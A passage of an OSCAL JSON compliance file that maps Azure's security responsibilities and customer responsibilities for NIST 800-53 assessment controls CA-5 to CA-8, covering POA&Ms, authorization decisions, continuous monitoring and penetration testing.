statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"d19929ba-bae9-438c-96be-2a7a3c514635","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-5","statements":[{"uuid":"83958371-1fa0-4b84-b781-1ccf1fd54ee4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-019"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-5_smt.a","by-components":[{"uuid":"59c26bca-9bda-4415-97ad-b239b9d3c877","export":{"provided":[{"uuid":"359080e7-7f75-4b24-8251-cdebfe0b0395","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-019"}],"description":"Azure develops plans of action and milestones (POA&Ms) in accordance with Office of Management and Budget guidance and certification requirements. POA&Ms are developed and maintained by Azure. The POA&M report is also updated monthly when vulnerability scans are run and any new vulnerabilities are identified, annually during security assessments, and as needed as a part of continuous monitoring activities. The POA&M is submitted as part of the Azure Security Authorization Package provided to the authorizing officials._x000D_ _x000D_"}],"responsibilities":[{"uuid":"74a2181c-7fa7-4448-999b-46271be41241","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-019"}],"description":"The customer is responsible for developing a plan of action and milestones (POA&M) for customer-deployed resources. The POA&M should include planned remedial actions to correct deficiencies noted during the security assessment (see CA-02) and to reduce/eliminate known vulnerabilities in the system. Additionally, any vulnerabilities found as a result of regular vulnerability scanning (see RA-05) must be included in POA&M reporting.","provided-uuid":"359080e7-7f75-4b24-8251-cdebfe0b0395"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"32d76925-3942-4919-bb0e-27de2461e726","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-020"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-5_smt.b","by-components":[{"uuid":"9f84058d-ae47-43d0-8ff8-5610d21f62ae","export":{"provided":[{"uuid":"eebdd03a-23d3-4886-9d9d-09a16c6a58c3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-020"}],"description":"Azure updates the POA&M report on at least a monthly basis based on the findings of the security control assessments and ongoing continuous monitoring activities, including vulnerability scanning. Microsoft includes an action step to remediate any items from ongoing assessments and vulnerability scans (if any) consistent with the vulnerability management process in the monthly POA&M submission. Microsoft provides a high-level description of the issue and the remediation plan. The raw scan reports contain details on any issues noted and is made available to the authorizing officials monthly._x000D_ _x000D_"}],"responsibilities":[{"uuid":"f336ef76-cb87-4f10-9922-6239e67dba53","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-020"}],"description":"The customer is responsible for updating POA&M items defined in CA-05.a, which should include findings from security assessments, impact analyses, and continuous monitoring activities.","provided-uuid":"eebdd03a-23d3-4886-9d9d-09a16c6a58c3"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"4ee63a29-59e5-45e0-ac04-08d6e2ea6ddc","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-6","statements":[{"uuid":"9b1ae086-cc37-465a-8ed9-d7c6c0f6c86b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-021"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-6_smt.a","by-components":[{"uuid":"0d25e3e3-6dc3-4935-83de-28c2ea259ee6","export":{"provided":[{"uuid":"557eb405-1d4c-4bd4-bbe5-28849d31c575","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-021"}],"description":"Assessment and authorization activities follow established Federal processes as documented in NIST Special Publication 800-37 Revision 2, Guide for Applying the Risk Management Framework to Federal Information Systems. As part of the Security Authorization process, the authorizing officials review the Azure Security Authorization package to understand the level of risk posed by vulnerabilities identified in the information system and determine whether to grant a provisional ATO. The explicit acceptance of the risk to customer agency operations, assets, and individuals is the responsibility of customer organizations. The customer must consider many factors, balancing security considerations with mission and operational needs. The customer issues an authorization decision for the information system after reviewing the authorization package submitted by the Azure System Owner. The authorization package provides the FedRAMP JAB, DISA/DoD authorizing officials, other regulators, and customers with the essential information needed to make a credible risk-based decision on whether to grant a P-ATO for the offerings and services that comprise Azure."}],"responsibilities":[{"uuid":"d225f2c2-6dee-4e9d-b46b-29ebb013ea2a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-021"}],"description":"The customer is responsible for assigning a senior authorizing official (AO) for customer-deployed resources.","provided-uuid":"557eb405-1d4c-4bd4-bbe5-28849d31c575"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"7a5999b1-2a52-481c-aa8b-80cf5d796cbf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-022"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-6_smt.b","by-components":[{"uuid":"00a970ac-33e0-4220-8f8b-6542147cb9d1","export":{"provided":[{"uuid":"547056d1-6c78-4316-b7e3-1bfbcad0b256","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-022"}],"description":"Assessment and authorization activities follow established Federal processes as documented in NIST Special Publication 800-37 Revision 2, Guide for Applying the Risk Management Framework to Federal Information Systems. The Microsoft system does not inherit security controls from other systems. As part of the Security Authorization process, the authorizing officials review the Azure Security Authorization package for common controls available for inheritance to understand the level of risk posed by vulnerabilities identified in the information system and determine whether to grant a provisional ATO. The explicit acceptance of the risk to customer agency operations, assets, and individuals is the responsibility of customer organizations. The customer must consider many factors, balancing security considerations with mission and operational needs. The customer issues an authorization decision for the information system after reviewing the authorization package submitted by the Azure System Owner. The authorization package provides the FedRAMP JAB, DISA/DoD authorizing officials, other regulators, and customers with the essential information needed to make a credible risk-based decision on whether to grant a P-ATO for the offerings and services that comprise Azure."}],"responsibilities":[{"uuid":"a4d8c457-1aae-4671-b7b3-257237f7b2ca","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-022"}],"description":"The customer is responsible for assigning a senior official as the authorizing official for common controls available for inheritance for customer-deployed resources.","provided-uuid":"547056d1-6c78-4316-b7e3-1bfbcad0b256"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"009227d6-aaa2-43e5-971a-f45b3ddca10d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-023"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-6_smt.c","by-components":[{"uuid":"26cc649f-380d-4aff-af93-10017d04ce34","export":{"provided":[{"uuid":"b27c3636-6493-4596-b6a6-f509b60ef542","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-023"}],"description":"The FedRAMP JAB, DISA/DoD authorizing officials, and other regulators determine if the remaining known vulnerabilities in the information system pose an acceptable level of risk to issue a P-ATO. Agencies must also determine whether the risk to agency operations, assets, and individuals is acceptable. Following review of the security authorization package and consultation with key agency officials, the FedRAMP JAB, DISA/DoD authorizing officials, and other regulators render an authorization decision to: * Authorize system operation without any restrictions or limitations on its operation; * Authorize system operation with restriction or limitation on its operation. The POA&M must be included detailed corrective actions to correct deficiencies. Resubmit an updated accreditation package upon completion of required POA&M actions to move to authorization to operate without any restrictions; or * Not authorize the system for operation."}],"responsibilities":[{"uuid":"c12b7f86-78b5-4a2a-9df0-deda2827d4c9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-023"}],"description":"The customer is responsible for ensuring customer-deployed resources are authorized before operations commence.","provided-uuid":"b27c3636-6493-4596-b6a6-f509b60ef542"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c1d8094b-6148-434b-a90e-81b54e4edc42","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-024"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-6_smt.d","by-components":[{"uuid":"dc30a07c-0372-4aa0-ac12-ad70b76551a9","export":{"provided":[{"uuid":"e76c468d-9895-4f38-b19a-d5c5c1e6c9d9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-024"}],"description":"The Microsoft system does not inherit security controls from other systems. The FedRAMP JAB, DISA/DoD authorizing officials, and other regulators determine if the remaining known vulnerabilities in the information system pose an acceptable level of risk to issue a P-ATO. Agencies must also determine whether the risk to agency operations, assets, and individuals is acceptable. Following review of the security authorization package and consultation with key agency officials, the FedRAMP JAB, DISA/DoD authorizing officials, and other regulators render an authorization decision to: * Authorize system operation without any restrictions or limitations on its operation; * Authorize system operation with restriction or limitation on its operation. The POA&M must be included detailed corrective actions to correct deficiencies. Resubmit an updated accreditation package upon completion of required POA&M actions to move to authorization to operate without any restrictions; or * Not authorize the system for operation."}],"responsibilities":[{"uuid":"e0864521-8868-4796-a16f-cd1d498e2d6d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-024"}],"description":"The customer is responsible for ensuring the authorizing official for common controls authorizes the use of those controls for inheritance by organizational systems.","provided-uuid":"e76c468d-9895-4f38-b19a-d5c5c1e6c9d9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"02af1af2-a503-4927-a750-632e30eb0fb6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-025"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-6_smt.e","by-components":[{"uuid":"72ea3fa4-2bfc-49c7-add1-acc8e3defe71","export":{"provided":[{"uuid":"a697b674-1863-4acf-ab5c-50b2d838d639","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-025"}],"description":"The FedRAMP JAB, DISA/DoD authorizing officials, and other regulators update the security authorization as needed based on submissions by Microsoft driven by the regular reauthorization schedule every three years or when there is a significant change as defined in NIST Special Publication 800-37 Revision 2, Appendix F."}],"responsibilities":[{"uuid":"b1e943fc-8c03-4dd0-bb8c-abd4011c3683","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-025"}],"description":"The customer is responsible for updating the security authorization for customer-deployed resources.","provided-uuid":"a697b674-1863-4acf-ab5c-50b2d838d639"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"91bdac4f-748f-4488-87ad-1c5ba0de5db6","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-7","statements":[{"uuid":"771484b0-39d3-4a1d-a304-af9eb6a9a6a9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-026"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-7_smt.a","by-components":[{"uuid":"be8824d8-9963-4100-bfeb-420bbf9f0a7a","export":{"provided":[{"uuid":"75a1500c-0903-4ac8-b692-ee4d97f4a3a3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-026"}],"description":"As part of the configuration management process, Microsoft performs a Security Impact Analysis (SIA) and Business Impact Analysis (BIA) for all significant changes. Deficiencies to the system are documented in the SSP and SAR that are included in the Security Authorization Package. As part of continuous monitoring, Azure documents such as the SSP, SAR, and POA&M are updated to reflect any newly identified or remediated security issues. Additionally, Microsoft tracks through closure all vulnerabilities identified using the vulnerability scanning processes described in RA-05. In addition, cloud services tagged in Azure compliance and security boundary are required to complete compliance onboarding requirements designed to ensure the utilization of common Azure processes and tooling for addressing security risks."}],"responsibilities":[{"uuid":"1d5d21e1-fe0f-4df8-b823-4305b2bbe047","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-026"}],"description":"The customer is responsible for developing a continuous monitoring strategy and implementing a continuous monitoring program for customer-deployed resources.","provided-uuid":"75a1500c-0903-4ac8-b692-ee4d97f4a3a3"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"e399ac29-0c12-40bc-b3e5-0f710ee98382","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-027"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-7_smt.b","by-components":[{"uuid":"9a5649a7-a988-4b85-9309-f4c47ed80e05","export":{"provided":[{"uuid":"632725c7-4583-436a-9361-aeca81ecd077","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-027"}],"description":"Microsoft tracks the rate of closure of POA&M and vulnerability items continuously and reviews this data at least monthly."}],"responsibilities":[{"uuid":"f65243ed-fc13-4d04-96b3-476600146bcb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-027"}],"description":"The customer is responsible for continuously monitoring customer-deployed resources and performing supporting assessments of that monitoring activity.","provided-uuid":"632725c7-4583-436a-9361-aeca81ecd077"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"426b4d42-be78-44d1-9e79-de1674782163","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-028"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-7_smt.c","by-components":[{"uuid":"623be9c3-08af-4084-89d9-89d9ab920888","export":{"provided":[{"uuid":"72686fb4-7333-458f-ae9c-fc00ae1e9311","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-028"}],"description":"Microsoft has designated a security assessment program to evaluate the ongoing effectiveness of security controls outlined in the Azure SSP. The Security Assessment Program includes the assessment of all controls identified as necessary. Additionally, recommended technical testing is performed to meet the continuous monitoring requirements identified."}],"responsibilities":[{"uuid":"2d65e74d-a4c9-4657-b617-c2200d7f0bd2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-028"}],"description":"The customer is responsible for ongoing security assessments in accordance with the customer's continuous monitoring strategy.","provided-uuid":"72686fb4-7333-458f-ae9c-fc00ae1e9311"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"ccd7aca1-7c6b-40bd-abca-2a56ddd34fdd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-029"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-7_smt.d","by-components":[{"uuid":"6684d027-1945-4e92-8ae9-84e2dc759dac","export":{"provided":[{"uuid":"9531f54d-0011-4aa1-90f6-ab4ac1a5ebc1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-029"}],"description":"Any new deficiencies that are identified from the security control assessments are documented in the POA&M. The POA&M is continuously updated and used to report on the security state of the information system as part of monthly reviews. POA&M updates are provided to customers monthly, consistent with requirements."}],"responsibilities":[{"uuid":"3a496ca9-5f31-4743-aa93-59dcf3668b6e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-029"}],"description":"The customer is responsible for ongoing security status monitoring of the metrics defined in CA-07 Part a.","provided-uuid":"9531f54d-0011-4aa1-90f6-ab4ac1a5ebc1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"8b851a3d-08c1-446d-be9f-92a7c95207ef","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-030"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-7_smt.e","by-components":[{"uuid":"cfc93d89-d2d0-465b-bc8c-bc0eac02683f","export":{"provided":[{"uuid":"c81b9ab5-d28a-4ae5-9282-fce524d93242","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-030"}],"description":"The Azure Continuous Monitoring team performs correlation and analysis of security-related information generated by assessments and monitoring, including vulnerability scan results, POA&M updates, and recurring control testing. Vulnerabilities are assessed if they are actionable (i.e. requiring remediation), risk reduced, false positive, or risk accepted. Microsoft mitigates all discovered high-risk vulnerabilities within thirty (30) days, all moderate-risk vulnerabilities within ninety (90) days, and all low-risk vulnerabilities within one hundred and eighty (180) days. The results are summarized into the Continuous Monitoring Reports and are input into the POA&M for tracking if applicable."}],"responsibilities":[{"uuid":"be3726a8-e54b-446b-a87d-dcd2348887c7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-030"}],"description":"The customer is responsible for correlating and analyzing security-related information generated by assessments and monitoring of customer-deployed resources.","provided-uuid":"c81b9ab5-d28a-4ae5-9282-fce524d93242"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"1c637107-2d14-4f03-b072-a6ce0e1ee474","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-031"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-7_smt.f","by-components":[{"uuid":"4d952a9f-4076-4516-b861-a3adfc55cbae","export":{"provided":[{"uuid":"d33b4cbe-cdb3-486b-aa60-834d805a9c71","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-031"}],"description":"The Azure Continuous Monitoring team tracks open POA&Ms and vulnerabilities and coordinates with the service teams to drive these issues to closure."}],"responsibilities":[{"uuid":"8e7e153d-ca3d-4649-8b42-2a8cabf36d48","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-031"}],"description":"The customer is responsible for responding to the results of the analysis defined in CA-07 Part e.","provided-uuid":"d33b4cbe-cdb3-486b-aa60-834d805a9c71"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"d4bd9526-708b-41a9-903f-e850d034c28d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-032"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-7_smt.g","by-components":[{"uuid":"f085ee58-a134-43a1-8d26-80605e0c937c","export":{"provided":[{"uuid":"a1e4b19b-2d7a-439a-a871-fa1dbde3de53","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-032"}],"description":"Any new deficiencies that are identified from the security control assessments are documented in the POA&M. The POA&M is continuously updated and used to report on the security state of the information system as part of monthly reviews. POA&M updates are reviewed and validated by the Third Party Assessment Organization (3PAO), and are provided to customers and the FedRAMP JAB, DISA/DoD authorizing officials, and other regulators monthly, consistent with requirements."}],"responsibilities":[{"uuid":"0ce385b4-4b1e-4dd6-8e0c-9cd3a5f606b8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-032"}],"description":"The customer is responsible for reporting the security status of customer-deployed resources","provided-uuid":"a1e4b19b-2d7a-439a-a871-fa1dbde3de53"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"de4c3bb8-392d-45ac-a931-05bdf243c344","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-7.1","statements":[{"uuid":"6cfe9620-cd62-4b74-8850-abdbcefb2c90","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-033"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-7.1_smt","by-components":[{"uuid":"e6e24afb-a983-4452-bd74-0c270422899a","export":{"provided":[{"uuid":"f9ccacd5-2d1a-4a83-8b86-21283d1a4626","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-033"}],"description":"Azure employs an independent assessment team to monitor security controls during monthly continuous monitoring activities and annually during the annual assessment. Azure utilizes an approved 3PAO to perform this monitoring, as well as to assess significant changes such as the addition of datacenters to the authorization boundary._x000D_ _x000D_"}],"responsibilities":[{"uuid":"d5b0002b-7996-438c-ae43-6b55b6e40199","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-033"}],"description":"The customer is responsible for employing independent assessors or assessment teams to monitor security controls for customer-deployed resources on an ongoing basis.","provided-uuid":"f9ccacd5-2d1a-4a83-8b86-21283d1a4626"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b49e151c-2047-46d4-9138-b8e3f0b2b95d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-7.4","statements":[{"uuid":"1cb972d0-6e99-4c13-9132-1ba41f030c66","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-034"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-7.4_smt","by-components":[{"uuid":"2fcf3a1d-ee1a-4baa-8401-5a394c2a45a8","export":{"provided":[{"uuid":"b71532f9-4b4b-435b-baf0-fdcce9848a20","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-034"}],"description":"Azure has designated a security assessment program to evaluate the ongoing effectiveness of security controls outlined in the Azure SSP as part of organizational defined continuous monitoring strategy. The Security Assessment Program includes the assessment of all controls identified in the High controls baseline of NIST SP 800-53 Revision 5, and recommended Security Controls for Information Systems and Organizations. Risk category is allocated to the security controls and controls deemed as core are tested on an annual basis by independent auditors and reviewed subsequently by Joint Authorization Board (JAB) of FedRAMP. Non-core controls are tested once every three years as determined by guidelines posed by the JAB. All controls are tested by independent auditors for effectiveness. Controls deemed not effective are allocated Plan of Action & Milestones (POA&Ms). Azure has a mature continuous monitoring program designed to track all identified POA&Ms. Risk categorization is applied on all POA&Ms and an analysis is done to ensure that appropriate mitigating factors/remediation steps are in place to address the risk of the POA&Ms. On a monthly cadence, POA&M reports are delivered to stakeholders of the security assessment program including independent auditors and the JAB. The mature Azure continuous monitoring program follows requirements posed by the JAB. The annual security assessment and continuous monitoring programs also bake in compliance and change monitoring whereby security controls are tested on an annual basis and identified POA&M are tracked continuously with monthly reporting to program stakeholders. Refer to CA-02 and CA-07 controls for more details on the programs."}],"responsibilities":[{"uuid":"b7071e4b-ab94-4292-a46d-28ea2bda634e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-034"}],"description":"The customer is responsible for ensuring risk monitoring is an integral part of the continuous monitoring strategy which includes effectiveness, compliance, and change monitoring for customer-deployed resources.","provided-uuid":"b71532f9-4b4b-435b-baf0-fdcce9848a20"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b905a025-3a57-4148-98a8-6173fa16fb51","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-8","statements":[{"uuid":"8382e980-d6f4-45ed-82e1-f29967812554","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-035"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-8_smt","by-components":[{"uuid":"6cc4f6e4-0c15-4695-babb-a915dd1fe15f","export":{"provided":[{"uuid":"49f839e4-e89e-4769-a07d-dee3a343edad","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-035"}],"description":"An independent penetration testing team within Microsoft's security organization conducts annual unannounced penetration testing (tests may be coordinated with Azure management personnel in order to mitigate risk to the availability of Azure; Azure management personnel do not notify operational/technical personnel in these cases)._x000D_ _x000D_ As part of the rules of engagement, the Third Party Assessment Organization (3PAO) conducts a vulnerability analysis of the information system and penetration testing based on those results, as identified in the Security Assessment Report (SAR). The analysis steps are as follows:_x000D_ _x000D_ * The Third Party Assessment Organization (3PAO)reviews the Azure system security plan to determine if the required elements as identified in NIST SP 800-18 Revision 1 were properly documented._x000D_ * The Third Party Assessment Organization (3PAO)reviews the Azure system security plan and related component documentation in order to determine if the security controls meet minimum security level recommendations as provided in NIST SP 800-53 Revision 4._x000D_ * The Third Party Assessment Organization 